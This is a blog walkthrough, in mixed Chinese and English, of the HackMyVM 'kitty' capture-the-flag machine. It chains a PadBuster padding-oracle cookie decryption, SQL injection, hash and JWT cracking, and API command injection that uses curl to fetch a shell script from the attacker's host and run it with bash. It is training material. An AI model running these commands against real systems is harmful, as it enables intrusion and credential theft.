当前位置:网站首页>hackmyvm: kitty walkthrough
hackmyvm: kitty walkthrough
2022-08-02 03:59:00 【xdeclearn】
hackmyvm: kitty walkthrough
0x01 oracle padding
端口扫描:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp gitea
使用curl访问80端口, 被重定向到http://kitty.hmv.
This website is a static website,通过ffufGet the virtual host name cookie.kitty.hmv.
注册用户test,查看cookie:
使用 oraclepadding.pl 破解该cookie.
* ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (237/256) [Byte 8]
[+] Success: (41/256) [Byte 7]
[+] Success: (219/256) [Byte 6]
[+] Success: (75/256) [Byte 5]
[+] Success: (240/256) [Byte 4]
[+] Success: (143/256) [Byte 3]
[+] Success: (29/256) [Byte 2]
[+] Success: (188/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 29751a62938de522
[+] Intermediate Bytes (HEX): 4ce47715b126d512
[+] Plain Text: user=tes
Use of uninitialized value $plainTextBytes in concatenation (.) or string at ./oraclepadding.pl line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***
[+] Success: (220/256) [Byte 8]
[+] Success: (32/256) [Byte 7]
[+] Success: (119/256) [Byte 6]
[+] Success: (112/256) [Byte 5]
[+] Success: (160/256) [Byte 4]
[+] Success: (229/256) [Byte 3]
[+] Success: (139/256) [Byte 2]
[+] Success: (171/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): 0d11b045b105c246
[+] Intermediate Bytes (HEX): 5d721d65948ae225
[+] Plain Text: t
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=test
[+] Decrypted value (HEX): 757365723D7465737407070707070707
[+] Decrypted value (Base64): dXNlcj10ZXN0BwcHBwcHBw==
-------------------------------------------------------
将用户名改为 admin,获取新的cookie.
0x02 sql injection
更新cookie后,刷新页面后,appeared on the page last_login.js,在该jsexists in the interfacesql注入.
使用 sqlmap, 获取到用户 gitea’s 密码hash和salt.
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea |
| salt | YXZpam5leWFt |
使用 hashcat破解得到密码:
* ~ hashcat -m 10 -a 0 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt /usr/share/wordlists/rockyou.txt --show
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme
0x03 openapi to shell
使用账户gitea登录host:3000, Got a new subdomain: http://whythisapiissofast.kitty.hmv.
访问 http://whythisapiissofast.kitty.hmv/openapi.json,检查各个api.
- 访问 api
http://whythisapiissofast.kitty.hmv/api/v2/-1,获取到用户nobody.
- 访问 api
http://whythisapiissofast.kitty.hmv/api/v2/-2,Get a private key.
3. 使用nobody获取access token,这是一个jwt.
4. 使用hashcat破解jwt的password.
- 伪造token,将用户
nobody改为admin,is_admin改为1,Add more time out.
6. 通过api /api/v2/secure/{command}执行命令,But there is a filter here
7. 使用curlRemote download malicioussh,通过bashExecute bypass filtering to achieve command execution,成功获取shell.
这里需要将nginx的index改为test.sh.
(1) whythisapiissofast.kitty.hmv/api/v2/secure/curl%20-o%20test.sh%20192.168.85.169%20-wget
(2) whythisapiissofast.kitty.hmv/api/v2/secure/bash%20test.sh%20-wget
0x04 get user flag
homeThere are two users in the directory.
利用步骤3The found private key is passedssh登录用户dyutidhara,成功获取用户flag.
0x05 root提权
Tried some methods and failed,If you have any success, please let me know in the comments,求帮助.
边栏推荐
- hackmyvm: again walkthrough
- PHP Foundation March Press Announcement Released
- PHP8.2 version release administrator and release plan
- 16. JS events, string and operator
- JS objects, functions and scopes
- CTF-网鼎杯往届题目
- 17. JS conditional statements and loops, and data type conversion
- vim编辑模式
- Orasi: 1 vulnhub walkthrough
- [campo/random-user-agent]随机伪造你的User-Agent
猜你喜欢
动力:2 vulnhub预排
(3) Thinkphp6 database
(1) introduction to Thinkphp6, installation view, template rendering, variable assignment
(4) Function, Bug, Class and Object, Encapsulation, Inheritance, Polymorphism, Copy
Thread Pool (Introduction and Use of Thread Pool)
(7) superficial "crawlers" process (concept + practice)
13.JS输出内容和语法
What are the killer super powerful frameworks or libraries or applications for PHP?
Praying: 1 vulnhub walkthrough
Praying: 1 vulnhub walkthrough
随机推荐
(1) introduction to Thinkphp6, installation view, template rendering, variable assignment
Pycharm打包项目为exe文件
[campo/random-user-agent] Randomly fake your User-Agent
4.表单与输入
MySql高级 -- 约束
Phonebook
JS对象, 函数和作用域
JS objects, functions and scopes
PHP的几个有趣的打开方式:从基本到变态
hackmyvm: may walkthrough
After the mailbox of the Pagoda Post Office is successfully set up, it can be sent but not received.
About the apache .htaccess file of tp
[mikehaertl/php-shellcommand] A library for invoking external command operations
Masashi: 1 vulnhub walkthrough
4. The form with the input
hackmyvm: controller walkthrough
hackmyvm: again walkthrough
(6) Design of student information management system
Xiaoyao multi-open emulator ADB driver connection
13. JS output content and syntax